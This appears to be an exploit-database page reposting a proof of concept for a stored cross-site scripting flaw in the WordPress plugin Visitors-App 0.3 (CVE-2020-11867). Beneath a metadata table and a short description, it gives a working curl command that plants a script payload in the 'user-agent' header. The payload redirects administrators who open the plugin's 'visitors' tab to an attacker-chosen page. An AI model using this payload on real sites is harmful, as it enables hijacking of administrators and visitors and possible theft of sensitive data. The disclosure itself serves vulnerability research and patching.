WordPress Visitors-App 0.3 Cross Site Scripting
CVE |
Category |
Price |
Severity |
CVE-2020-11867 |
CWE-79 |
$500 |
High |
Author |
Risk |
Exploitation Type |
Date |
John Doe |
High |
Remote |
2021-06-09 |
CPE |
cpe:cpe:/a:wordpress:wordpress_visitors_app:0.3 |
CVSS vector description
Metric |
Value |
Metric Description |
Value Description |
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021060054
Below is a copy:
WordPress Visitors-App 0.3 Cross Site Scripting# Exploit Title: WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS)
# Date: 09/06/2021
# Exploit Author: Mesut Cetin
# Vendor Homepage: https://profiles.wordpress.org/domingoruiz/
# Software Link: https://wordpress.org/plugins/visitors-app/
# Version: 0.3
# Tested on: Debian GNU/Linux 10
# Reference: https://wpscan.com/vulnerability/06f1889d-8e2f-481a-b91b-3a8008e00ffc
## Description:
# A vulnerability in the Wordpress plugin "visitors" version 0.3 and prior allows remote attacker through
# Cross-Site Scripting (XSS) to redirect administrators and visitors and potentially obtain sensitive informations
# The 'user-agent' parameter allows attacker to escalate their privileges.
## PoC
# Replace google.com with malicious attacker page
curl -i http://localhost/wordpress --user-agent "</script><script>location=([]+/http:\\google.com/g).substr(1,19); </script>"
# on http://localhost/wordpress/wp-admin, browse the tab "visitors"
Copyright ©2024 Exploitalert.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.